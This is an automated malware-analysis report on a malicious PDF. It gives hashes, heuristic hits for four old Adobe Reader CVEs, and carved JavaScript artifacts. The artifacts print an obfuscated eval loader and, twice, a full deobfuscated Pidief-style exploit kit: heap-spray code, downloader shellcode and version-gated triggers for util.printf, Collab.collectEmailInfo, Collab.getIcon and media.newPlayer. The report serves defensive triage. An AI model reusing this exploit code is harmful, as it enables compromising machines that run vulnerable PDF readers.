PDF malware analysis — malicious · cdfad701a3ce5cbb

MALICIOUS

PDF

6.2 KB Authoring application: Ltazonamozixiwa (via Befivqeuo) First seen: 2026-05-11

MD5: f0e37ccc3c21521cca8ee7542ff6ee19 SHA-1: 273ec3348e9cfc660f83d33c487ffd18b619d71f SHA-256: cdfad701a3ce5cbb508133d4e2787959c244ee133a5fa239d4580d4a27659fb9

408 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1204.002 Malicious File

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The ML classifier also flagged this PDF with a high probability of being malicious. The JavaScript stream is likely responsible for downloading and executing a second-stage payload, which is a common technique for malware delivery. No specific family could be identified.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 9

media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324

PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927

PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992

PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH

A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT

One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0015_000.js`	pdf-javascript-stream	PDF /JS object 15 at offset 0x130B	1342 bytes
SHA-256: `fb971b5d9fb98dfef674cca6ff5479e441697a15fe8c5fa2614fd78d854a252d`
Preview script First 1,000 lines of the extracted script var x="ge"+"tPdsJG".substr(0,2)+"ag"+"D4KceNcD4K".substr(4,2)+"th"+"wnQWonwQ".substr(3,2)+"rd";var d=62;var p=String("eva1Wn".substr(0,3)+"0yb4lby04".substr(4,1));;var f=String;var t=1;var z="fro"+"mChtBen".substr(0,3)+"arC"+"RY8odeRY8".substr(3,3);var zY=46-45;var aJ=new String("sub"+"strmoT".substr(0,3));var n=21-19;var fK=new String("char"+"CodeyDW1".substr(0,4)+"AtSxOT".substr(0,2));var oH=String("leng"+"thL7i".substr(0,2));var b="chW1E".substr(0,2)+"ar"+"CozAI".substr(0,2)+"qQI5deq5IQ".substr(4,2)+"ckpLAtcpLk".substr(4,2);var xS=100-100;var sD=this;var dS="";var eP=new String("%");var l=393-377;var r="getP"+"ageN"+"umWoyfz".substr(0,4)+"qMUprdsqUpM".substr(4,3);function pQ(mV,sZ){return eP+mV};function pO(cR,fG,sZ){return cR-fG};var iB=sD[r](t);function fI(mV,sZ){dS=dS+mV};function sP(bE,gX,sZ){return bE[b](gX)};var fK=sD[fK];function v(zQ,sZ){return zQ[oH]-n};function gT(zQ,lI,sZ){return zQ[lI]};var kX=new f();function xG(eJ,sZ){return sD[x](t,eJ)};var zG=sD[p];function wV(h,tS,sZ){return h^d;};function gL(mV,sZ){var mV=parseInt(mV,l);mV=wV(mV);mV=gT(f,z)(mV);return mV}function nG(mV,sZ){var qL=v(mV);mV=tSP(mV,qL);return gL(mV)};function hG(cR,fG,sZ){return cR+fG};function tSP(zQ,gX,sZ){return zQ[aJ](gX,n)};function oJ(eJ,sZ){var lY=xG(eJ);lY=nG(lY);return lY;}for(var eJ=xS;eJ<iB;eJ++){var uX=oJ(eJ);fI(uX);}zG(dS);
`legacy_pdfkit_stage_000.js`	deobfuscated-js	getPageWords-XOR Pidief stage normalized at offset 0x0	3762 bytes
SHA-256: `6c89621aae4e0cedf8a0c075106741f4f0ba08588ed3602780f20d04b778babe`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var src_table = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%'; var dest_table= 'JQ2cS-uPHtBa/gCNDfU6Ej:lwxnM1L0k&sOI9imTpqXbd3GA%?0WY48y_V.ZvrRFe7zhKo5='; var hwTl9Dn = new Array(); function get_shellcode(name) { var u = get_url(); u = for_unescape(u); var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455"; s+= u; return unescape(s); } function get_url(){ var str = this.info.title; var ret = encode_str(str, dest_table, src_table); return ret; }; function encode_str(str, src_table, dest_table){ var ret=""; for(var i=0; i < str.length; i++) { var index = src_table.indexOf(str[i]); if(index > -1 ) { ret += dest_table[index]; } } return ret; }; function for_unescape(str) { var out = ""; str = bin2hex(str); g = Math.round(str.length / 4); if (g != str.length /4) str+="00"; for(var i=0; i < str.length; i+=4) { out+="%u" + str.substr(i+2, 2) + str.substr(i, 2); } return out; } function bin2hex (s){ var i, f = 0, a = []; s += ''; f = s.length; for (i = 0; i<f; i++) { a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase(); } return a.join(''); } function Rq4v1qCC(PDrScZj4, ez5pL6){ while (PDrScZj4.length * 2 < ez5pL6){ PDrScZj4 += PDrScZj4; } PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2); return PDrScZj4; } function x8EvTm(I7T0vko5){ var qPBt7D = 0x0c0c0c0c; NRjjR6W6 = get_shellcode("pdf"); if (I7T0vko5 == 1){qPBt7D = 0x30303030;} var FeQq1Vv = 0x400000; var tsSzSc = NRjjR6W6.length * 2; var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38); var PDrScZj4 = unescape("%u9090%u9090"); PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6); var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv; for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){ hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6; } } function U2UcYKr(){ var IyIFVe = app.viewerVersion.toString(); if (IyIFVe > 8) { x8EvTm(1); var iVvCdy8 = "12999999999999999999"; for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ ) { iVvCdy8 += "8"; } util.printf("%45000f", iVvCdy8); } if (IyIFVe < 8){ x8EvTm(0); var UNXaCTHb = unescape("%u0c0c%u0c0c"); while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb; this .collabStore = Collab.collectEmailInfo({ subj : "", msg : UNXaCTHb}); } if (IyIFVe < 9.1){ if (app.doc.Collab.getIcon) { x8EvTm(0); var eGREUTNw = unescape("%09"); while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw; eGREUTNw = "N." + eGREUTNw; app.doc.Collab.getIcon(eGREUTNw); } } if (IyIFVe == 9.2){ x8EvTm(1); var sf="1.000000000.000000000.1337 : 3.13.37"; util.printd(sf, new Date()); try { media.newPlayer(null); } catch(e) {} util.printd(sf, new Date()); } } U2UcYKr(); n. ^^�. .?>� ��x�
`legacy_pdfkit_stage_001.js`	deobfuscated-js	getPageWords-XOR Pidief stage normalized at offset 0x0	3775 bytes
SHA-256: `39bdf6567f634d5b98574af9bf6aa296421419cf2241b879ff395c2daaa89c82`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script �� var src_table = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%'; var dest_table= 'JQ2cS-uPHtBa/gCNDfU6Ej:lwxnM1L0k&sOI9imTpqXbd3GA%?0WY48y_V.ZvrRFe7zhKo5='; var hwTl9Dn = new Array(); function get_shellcode(name) { var u = get_url(); u = for_unescape(u); var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455"; s+= u; return unescape(s); } function get_url(){ var str = this.info.title; var ret = encode_str(str, dest_table, src_table); return ret; }; function encode_str(str, src_table, dest_table){ var ret=""; for(var i=0; i < str.length; i++) { var index = src_table.indexOf(str[i]); if(index > -1 ) { ret += dest_table[index]; } } return ret; }; function for_unescape(str) { var out = ""; str = bin2hex(str); g = Math.round(str.length / 4); if (g != str.length /4) str+="00"; for(var i=0; i < str.length; i+=4) { out+="%u" + str.substr(i+2, 2) + str.substr(i, 2); } return out; } function bin2hex (s){ var i, f = 0, a = []; s += ''; f = s.length; for (i = 0; i<f; i++) { a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase(); } return a.join(''); } function Rq4v1qCC(PDrScZj4, ez5pL6){ while (PDrScZj4.length * 2 < ez5pL6){ PDrScZj4 += PDrScZj4; } PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2); return PDrScZj4; } function x8EvTm(I7T0vko5){ var qPBt7D = 0x0c0c0c0c; NRjjR6W6 = get_shellcode("pdf"); if (I7T0vko5 == 1){qPBt7D = 0x30303030;} var FeQq1Vv = 0x400000; var tsSzSc = NRjjR6W6.length * 2; var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38); var PDrScZj4 = unescape("%u9090%u9090"); PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6); var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv; for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){ hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6; } } function U2UcYKr(){ var IyIFVe = app.viewerVersion.toString(); if (IyIFVe > 8) { x8EvTm(1); var iVvCdy8 = "12999999999999999999"; for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ ) { iVvCdy8 += "8"; } util.printf("%45000f", iVvCdy8); } if (IyIFVe < 8){ x8EvTm(0); var UNXaCTHb = unescape("%u0c0c%u0c0c"); while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb; this .collabStore = Collab.collectEmailInfo({ subj : "", msg : UNXaCTHb}); } if (IyIFVe < 9.1){ if (app.doc.Collab.getIcon) { x8EvTm(0); var eGREUTNw = unescape("%09"); while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw; eGREUTNw = "N." + eGREUTNw; app.doc.Collab.getIcon(eGREUTNw); } } if (IyIFVe == 9.2){ x8EvTm(1); var sf="1.000000000.000000000.1337 : 3.13.37"; util.printd(sf, new Date()); try { media.newPlayer(null); } catch(e) {} util.printd(sf, new Date()); } } U2UcYKr(); ��..��

Open this report in the interactive analyzer, or submit your own file for analysis.